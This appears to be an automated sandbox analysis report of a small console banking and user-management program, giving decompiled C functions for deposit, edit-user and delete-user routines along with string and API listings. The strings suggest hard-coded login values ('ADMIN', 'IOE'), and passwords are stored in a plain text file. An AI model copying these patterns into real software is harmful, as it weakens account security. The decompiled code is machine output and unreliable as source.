_wprintf.LIBCMT ref: 012B2444
_wprintf.LIBCMT ref: 012B245A
_wprintf.LIBCMT ref: 012B2470
_wprintf.LIBCMT ref: 012B2486
_wprintf.LIBCMT ref: 012B249C
_wprintf.LIBCMT ref: 012B24CA
_wprintf.LIBCMT ref: 012B24E2

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Strings

ADMIN, xrefs: 012B23D9
Password : , xrefs: 012B237C
Only THREE attempts shall be allowed to enter username and password., xrefs: 012B2332
Press any key to exit the program..., xrefs: 012B23C5
1. Add User, xrefs: 012B243F
4. View User Log, xrefs: 012B2481
Are you sure you want to exit? <Y/N> : , xrefs: 012B253D
5. Exit, xrefs: 012B2497
2. Delete User, xrefs: 012B2455
N, xrefs: 012B24BF
Press a number between the range [1 -5] , xrefs: 012B24DD
Press ENTER to return to main menu..., xrefs: 012B2589
Your input is out of range! Enter a choice between 1 to 5!, xrefs: 012B2573
IOE, xrefs: 012B23EE
3. Edit User name / Password, xrefs: 012B246B
Enter User name : , xrefs: 012B2355

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
API String ID: 3691436685-2046970424
Opcode ID: 8e8c60288f117186501c38ef16f618e1d97d2ee09780a0e9ec4abd7406f65f28
Instruction ID: c5e9730fd3928bfd7529a1cf5468faa3e1df69ef4f4f78a04a13b92535aba0c8
Opcode Fuzzy Hash: 8e8c60288f117186501c38ef16f618e1d97d2ee09780a0e9ec4abd7406f65f28
Instruction Fuzzy Hash: BE6141B0EB0307A6EB14BBB4ADD3BEE76725F65BC0F000129EA05752C1E9B161588767

Uniqueness

Uniqueness Score: -1.00%

Function 012B4640, Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E012B4640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v280;
				char _v360;
				char _v440;
				void* __ebp;
				void* _t57;
				char _t73;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t103;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t129;
				intOrPtr _t134;
				void* _t137;
				void* _t141;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t163;

				_t170 = __fp0;
				_t168 = __eflags;
				_t136 = __esi;
				_t135 = __edi;
				_t101 = __ebx;
				_v16 = 0;
				E012B20E0(__ecx, __edi, __esi, __eflags, __fp0);
				E012B12B0(5, 0xa);
				_push("Deposit to A/C number            : ");
				E012B715C(__ebx, __edi, __esi, __eflags);
				E012B738B("%s",  &_v28);
				 *0x12d2f28 = E012B6EF1("ACCOUNT.DAT", "r");
				_t103 =  *0x12d2f28; // 0x0
				_push(_t103);
				E012B6DB6(__ebx, _t135, _t136, _t168);
				_t141 = _t137 + 0x18;
				_t169 = _v16;
				if(_v16 == 0) {
					E012B20E0(_t103, _t135, _t136, _t169, __fp0);
					E012B12B0(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E012B715C(_t101, _t135, _t136, _t169);
				}
				E012B12B0(0x32, 0xa);
				_push( &_v244);
				_push("[ %s ]");
				E012B715C(_t101, _t135, _t136, __eflags);
				E012B12B0(5, 0xc);
				_push("Amount to be Deposited (in NRs.) : ");
				E012B715C(_t101, _t135, _t136, __eflags);
				E012B738B("%f",  &_v12);
				E012B20E0(_t103, _t135, _t136, __eflags, __fp0);
				E012B12B0(0x1e, 0xa);
				_push("Confirm Transaction");
				_t57 = E012B715C(_t101, _t135, _t136, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E012B1870(_t57,  &_v280);
				E012B12B0(3, 0xc);
				_push( &_v244);
				_push( &_v28);
				E012B715C(_t101, _t135, _t136, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E012B1B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
				E012B8140( &_v360,  &_v440);
				E012B8140( &_v360, "]");
				E012B12B0(0x28 - (E012B82C0( &_v360) >> 1), 0xe);
				_push( &_v360);
				E012B7229(_t101, _t135, _t136, __eflags);
				E012B12B0(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E012B715C(_t101, _t135, _t136, __eflags);
				_t151 = _t141 + 0x24 - 8 + 0x1c;
				_t73 = _v5;
				__eflags = _t73 - 0x59;
				if(_t73 == 0x59) {
					L4:
					 *0x12d2f28 = E012B6EF1("ACCOUNT.DAT", "r");
					_t75 = E012B6EF1("TEMP.DAT", "a");
					_t153 = _t151 + 0x10;
					 *0x12d2f24 = _t75;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t129 =  *0x12d2f28; // 0x0
						_t80 = E012B7021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t154 = _t153 + 0x38;
						__eflags = _t80 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t93 = E012B8230( &_v208,  &_v28);
						_t163 = _t154 + 8;
						__eflags = _t93;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("addss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t134 =  *0x12d2f24; // 0x0
						_push(_t134);
						E012B6F06(_t101, _t135, _t136, __eflags);
						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
					}
					_t81 =  *0x12d2f24; // 0x0
					_push(_t81);
					E012B6DB6(_t101, _t135, _t136, __eflags);
					_t113 =  *0x12d2f28; // 0x0
					_push(_t113);
					E012B6DB6(_t101, _t135, _t136, __eflags);
					 *0x12d2f28 = E012B6EF1("TRANSACTION.DAT", "a");
					E012B8417(__eflags, 0x12d2f30);
					_push(0x12d2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0x12d2f30);
					_push(0x12d2f40);
					_push("Cash+Deposited");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t86 =  *0x12d2f28; // 0x0
					_push(_t86);
					E012B6F06(_t101, _t135, _t136, __eflags);
					_t114 =  *0x12d2f28; // 0x0
					_push(_t114);
					E012B6DB6(_t101, _t135, _t136, __eflags);
					E012B20E0(_t114, _t135, _t136, __eflags, _t170);
					E012B12B0(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E012B715C(_t101, _t135, _t136, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L4;
				}
				return _t73;
			}

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B4663
_wscanf.LIBCMT ref: 012B4674

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_wprintf.LIBCMT ref: 012B46BB

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B46DD
_wprintf.LIBCMT ref: 012B46F3
_wscanf.LIBCMT ref: 012B4704
_wprintf.LIBCMT ref: 012B471F
_wprintf.LIBCMT ref: 012B475A
_wprintf.LIBCMT ref: 012B47E2

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2152

Strings

%s %s %s %s %.2f %s, xrefs: 012B4994
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B486A
%s to be deposited in A/C number : %s [ %s ], xrefs: 012B4755
TEMP.DAT, xrefs: 012B481C
[ %s ], xrefs: 012B46D8
Deposit to A/C number : , xrefs: 012B465E
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012B47DD
TRANSACTION.DAT, xrefs: 012B4950
Transaction completed successfully!, xrefs: 012B49C4
Amount to be Deposited (in NRs.) : , xrefs: 012B46EE
Cash+Deposited, xrefs: 012B498B
ACCOUNT.DAT, xrefs: 012B4681
Confirm Transaction, xrefs: 012B471A
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 012B4915
ACCOUNT.DAT, xrefs: 012B4805
Given A/C number does not exits!, xrefs: 012B46B6

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
API String ID: 532294799-930819241
Opcode ID: 8feceb237973636f726615a5dd17e93c5547c3f13532f4980d4f1b2a6c685bcd
Instruction ID: 4d9dc448db54fc257a90dc3d93eb099a66b02117937673131212f42972b6e71c
Opcode Fuzzy Hash: 8feceb237973636f726615a5dd17e93c5547c3f13532f4980d4f1b2a6c685bcd
Instruction Fuzzy Hash: 8D91B3B2D7020AABDB15FBA0DCC2EEE73789F69740F044659F50575180FA7066888BB6

Uniqueness

Uniqueness Score: -1.00%

Function 012B2B10, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 243
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012B2B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v48;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v83;
				char _v87;
				char _v91;
				char _v95;
				char _v99;
				char _v103;
				char _v107;
				char _v111;
				char _v112;
				char _v144;
				char _v176;
				char _v208;
				void* __ebp;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t105;
				char _t106;
				void* _t109;
				void* _t110;
				intOrPtr _t119;
				intOrPtr _t130;
				intOrPtr _t132;
				void* _t136;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t149;
				void* _t150;
				void* _t154;

				_t161 = __fp0;
				_t135 = __esi;
				_t134 = __edi;
				_t113 = __ebx;
				_v48 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v112 = 0;
				_v111 = 0;
				_v107 = 0;
				_v103 = 0;
				_v99 = 0;
				_v95 = 0;
				_v91 = 0;
				_v87 = 0;
				_v83 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v16 = 0;
				_v12 = 0;
				E012B20E0(0, __edi, __esi, 0, __fp0);
				E012B12B0(0x19, 8);
				_push("User Name  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B738B("%s", 0x12d2ee4);
				E012B12B0(0x19, 0xa);
				_push("Password  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B12F0(_t134, _t135,  &_v112);
				_t66 = E012B6EF1("USER.DAT", "r");
				_t140 = _t136 + 0x18;
				 *0x12d2f28 = _t66;
				while(1) {
					_push( &_v144);
					_push( &_v176);
					_t67 =  *0x12d2f28; // 0x0
					_t68 = E012B7021(_t67, "%s %s %s\n", 0x12d2ee0);
					_t141 = _t140 + 0x14;
					if(_t68 == 0xffffffff) {
						break;
					}
					_t109 = E012B8230(0x12d2ee4,  &_v176);
					_t140 = _t141 + 8;
					if(_t109 == 0) {
						_t110 = E012B8230(0x12d2f02,  &_v144);
						_t140 = _t140 + 8;
						if(_t110 == 0) {
							_v16 = _v16 + 1;
						}
					}
				}
				_t116 =  *0x12d2f28; // 0x0
				_push(_t116);
				E012B6DB6(_t113, _t134, _t135, __eflags);
				_t142 = _t141 + 4;
				E012B20E0(_t116, _t134, _t135, __eflags, _t161);
				__eflags = _v16;
				if(__eflags != 0) {
					E012B12B0(8, 0xa);
					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
					E012B715C(_t113, _t134, _t135, __eflags);
					_t143 = _t142 + 4;
					__eflags = _v5 - 0x59;
					if(__eflags == 0) {
						do {
							L10:
							E012B20E0(_t116, _t134, _t135, __eflags, _t161);
							_v12 = 0;
							E012B12B0(0x19, 8);
							_push("NEW User Name        : ");
							E012B715C(_t113, _t134, _t135, __eflags);
							E012B738B("%s",  &_v208);
							E012B12B0(0x19, 0xa);
							_push("NEW Password         : ");
							E012B715C(_t113, _t134, _t135, __eflags);
							E012B12F0(_t134, _t135,  &_v48);
							E012B12B0(0x19, 0xc);
							_push("Confirm NEW Password : ");
							E012B715C(_t113, _t134, _t135, __eflags);
							E012B12F0(_t134, _t135,  &_v80);
							_t116 =  &_v80;
							_t84 = E012B8230( &_v48,  &_v80);
							_t143 = _t143 + 0x1c;
							__eflags = _t84;
							if(__eflags != 0) {
								E012B20E0( &_v80, _t134, _t135, __eflags, _t161);
								E012B12B0(0xa, 0xa);
								_push(0x12cf710);
								E012B715C(_t113, _t134, _t135, __eflags);
								_t143 = _t143 + 4;
								_t105 = _v12 + 1;
								__eflags = _t105;
								_v12 = _t105;
							}
							__eflags = _v12;
						} while (__eflags != 0);
						 *0x12d2f28 = E012B6EF1("USER.DAT", 0x12cf740);
						_t86 = E012B6EF1("temp.dat", "a");
						_t149 = _t143 + 0x10;
						 *0x12d2f20 = _t86;
						while(1) {
							_push( &_v144);
							_push( &_v176);
							_t87 =  *0x12d2f28; // 0x0
							_t88 = E012B7021(_t87, "%s %s %s\n", 0x12d2ee0);
							_t150 = _t149 + 0x14;
							__eflags = _t88 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t95 = E012B8230(0x12d2ee4,  &_v176);
							_t154 = _t150 + 8;
							__eflags = _t95;
							if(__eflags != 0) {
								L17:
								_push( &_v144);
								_push( &_v176);
								_push(0x12d2ee0);
								_push("%s %s %s\n");
								_t130 =  *0x12d2f20; // 0x0
								_push(_t130);
								E012B6F06(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								L19:
								continue;
							}
							_t98 = E012B8230(0x12d2f02,  &_v144);
							_t154 = _t154 + 8;
							__eflags = _t98;
							if(__eflags == 0) {
								_push( &_v48);
								_push( &_v208);
								_push(0x12d2ee0);
								_push("%s %s %s\n");
								_t132 =  *0x12d2f20; // 0x0
								_push(_t132);
								E012B6F06(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								goto L19;
							}
							goto L17;
						}
						_t89 =  *0x12d2f28; // 0x0
						_push(_t89);
						E012B6DB6(_t113, _t134, _t135, __eflags);
						_t119 =  *0x12d2f20; // 0x0
						_push(_t119);
						E012B6DB6(_t113, _t134, _t135, __eflags);
						E012B20E0(_t119, _t134, _t135, __eflags, _t161);
						E012B12B0(0x19, 0xa);
						_push("Record has been EDITED successfully!");
						return E012B715C(_t113, _t134, _t135, __eflags);
					}
					_t106 = _v5;
					__eflags = _t106 - 0x79;
					if(__eflags != 0) {
						return _t106;
					}
					goto L10;
				}
				E012B12B0(0xa, 0xa);
				_push(0x12cf640);
				return E012B715C(_t113, _t134, _t135, __eflags);
			}

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B2B94
_wscanf.LIBCMT ref: 012B2BA6

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B2BBC

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_swscanf.LIBCMT ref: 012B2C02

Part of subcall function 012B7021: _vfscanf.LIBCMT ref: 012B7035

_wprintf.LIBCMT ref: 012B2C72
_wprintf.LIBCMT ref: 012B2C8D
_wprintf.LIBCMT ref: 012B2CC5
_wscanf.LIBCMT ref: 012B2CD9
_wprintf.LIBCMT ref: 012B2CEF
_wprintf.LIBCMT ref: 012B2D0E
_wprintf.LIBCMT ref: 012B2D46
_swscanf.LIBCMT ref: 012B2DAD
_fprintf.LIBCMT ref: 012B2E0D
_fprintf.LIBCMT ref: 012B2E33
_wprintf.LIBCMT ref: 012B2E70

Strings

Are you sure you want to CHANGE user name and/or password? <Y/N> : , xrefs: 012B2C88
%s %s %s, xrefs: 012B2DA2
NEW User Name : , xrefs: 012B2CC0
Record has been EDITED successfully!, xrefs: 012B2E6B
User Name : , xrefs: 012B2B8F
USER.DAT, xrefs: 012B2D66
%s %s %s, xrefs: 012B2BF7
NEW Password : , xrefs: 012B2CEA
%s %s %s, xrefs: 012B2E27
%s %s %s, xrefs: 012B2E01
Password : , xrefs: 012B2BB7
USER.DAT, xrefs: 012B2BD2
Confirm NEW Password : , xrefs: 012B2D09
temp.dat, xrefs: 012B2D7D

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
API String ID: 1431756120-371646773
Opcode ID: 51d85caa64092905a8052e4c1fb7ac626fcde7ef8f7fdff9aab1796bed77a148
Instruction ID: f56b5f0cccc7a329e9b9c8095a08607b70dfdff6ce29e4bf9602f87a4d424d1d
Opcode Fuzzy Hash: 51d85caa64092905a8052e4c1fb7ac626fcde7ef8f7fdff9aab1796bed77a148
Instruction Fuzzy Hash: AF81A3B1D70306EEEB14EBE5DCC2FED76756F25780F04856DE608B6280E67061188B76

Uniqueness

Uniqueness Score: -1.00%

Function 012B2800, Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 223
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E012B2800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				char _v20;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v52;
				char _v84;
				char _v116;
				char _v129;
				char _v139;
				char _v154;
				char _v188;
				void* __ebp;
				intOrPtr _t47;
				void* _t49;
				char _t54;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t62;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t128;
				void* _t132;
				void* _t133;
				void* _t139;

				_t146 = __fp0;
				_t117 = __esi;
				_t116 = __edi;
				_t89 = __ebx;
				_v52 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v12 = 0;
				E012B20E0(__ecx, __edi, __esi, 0, __fp0);
				E012B12B0(0x19, 8);
				_push("User Name  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B738B("%s", 0x12d2ee4);
				E012B12B0(0x19, 0xa);
				_push("Password  : ");
				E012B715C(__ebx, __edi, __esi, 0);
				E012B12F0(_t116, _t117,  &_v52);
				_t47 = E012B6EF1("USER.DAT", "r");
				_t122 = _t118 + 0x18;
				 *0x12d2f28 = _t47;
				while(1) {
					_push( &_v116);
					_push( &_v84);
					_t92 =  *0x12d2f28; // 0x0
					_t49 = E012B7021(_t92, "%s %s %s\n", 0x12d2ee0);
					_t123 = _t122 + 0x14;
					if(_t49 == 0xffffffff) {
						break;
					}
					_t86 = E012B8230(0x12d2ee4,  &_v84);
					_t122 = _t123 + 8;
					if(_t86 == 0) {
						_t88 = E012B8230(0x12d2f02,  &_v116);
						_t122 = _t122 + 8;
						if(_t88 == 0) {
							_v12 = _v12 + 1;
						}
					}
				}
				_t105 =  *0x12d2f28; // 0x0
				_push(_t105);
				E012B6DB6(_t89, _t116, _t117, __eflags);
				_t124 = _t123 + 4;
				E012B20E0(_t92, _t116, _t117, __eflags, _t146);
				__eflags = _v12;
				if(__eflags != 0) {
					E012B12B0(0xf, 0xa);
					_push("Are you sure you want to DELETE this user? <Y/N> : ");
					E012B715C(_t89, _t116, _t117, __eflags);
					_t125 = _t124 + 4;
					_t54 = _v5;
					__eflags = _t54 - 0x59;
					if(_t54 == 0x59) {
						L10:
						 *0x12d2f28 = E012B6EF1("USER.DAT", "r");
						_t56 = E012B6EF1("temp.dat", "a");
						_t127 = _t125 + 0x10;
						 *0x12d2f20 = _t56;
						while(1) {
							_push( &_v116);
							_push( &_v84);
							_t93 =  *0x12d2f28; // 0x0
							_t58 = E012B7021(_t93, "%s %s %s\n", 0x12d2ee0);
							_t128 = _t127 + 0x14;
							__eflags = _t58 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t79 = E012B8230(0x12d2ee4,  &_v84);
							_t139 = _t128 + 8;
							__eflags = _t79;
							if(__eflags != 0) {
								L14:
								_push( &_v116);
								_push( &_v84);
								_push(0x12d2ee0);
								_push("%s %s %s\n");
								_t80 =  *0x12d2f20; // 0x0
								_push(_t80);
								E012B6F06(_t89, _t116, _t117, __eflags);
								_t127 = _t139 + 0x14;
								L15:
								continue;
							}
							_t83 = E012B8230(0x12d2f02,  &_v116);
							_t127 = _t139 + 8;
							__eflags = _t83;
							if(__eflags == 0) {
								goto L15;
							}
							goto L14;
						}
						_t94 =  *0x12d2f28; // 0x0
						_push(_t94);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						_t107 =  *0x12d2f20; // 0x0
						_push(_t107);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						 *0x12d2f28 = E012B6EF1("LOG.DAT", "r");
						_t62 = E012B6EF1("temp.dat", "w");
						_t132 = _t128 + 0x18;
						 *0x12d2f20 = _t62;
						while(1) {
							_push( &_v129);
							_push( &_v139);
							_push( &_v154);
							_t96 =  *0x12d2f28; // 0x0
							_t65 = E012B7021(_t96, "%s %s %s %s",  &_v188);
							_t133 = _t132 + 0x18;
							__eflags = _t65 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							E012C7CF2( &_v188);
							E012C7CF2( &_v20);
							_t75 = E012B8230( &_v188,  &_v20);
							_t132 = _t133 + 0x10;
							__eflags = _t75;
							if(__eflags != 0) {
								_push( &_v129);
								_push( &_v139);
								_push( &_v154);
								_push( &_v188);
								_push("%s %s %s %s\n");
								_t99 =  *0x12d2f20; // 0x0
								_push(_t99);
								E012B6F06(_t89, _t116, _t117, __eflags);
								_t132 = _t132 + 0x18;
							}
						}
						_t109 =  *0x12d2f28; // 0x0
						_push(_t109);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						_t67 =  *0x12d2f20; // 0x0
						_push(_t67);
						E012B6DB6(_t89, _t116, _t117, __eflags);
						E012B20E0(_t96, _t116, _t117, __eflags, _t146);
						E012B12B0(0x19, 0xa);
						_push("Record DELETED successfully!");
						return E012B715C(_t89, _t116, _t117, __eflags);
					}
					__eflags = _v5 - 0x79;
					if(_v5 != 0x79) {
						return _t54;
					}
					goto L10;
				}
				E012B12B0(0xa, 0xa);
				_push(0x12cf4fc);
				return E012B715C(_t89, _t116, _t117, __eflags);
			}

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B2841
_wscanf.LIBCMT ref: 012B2853

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

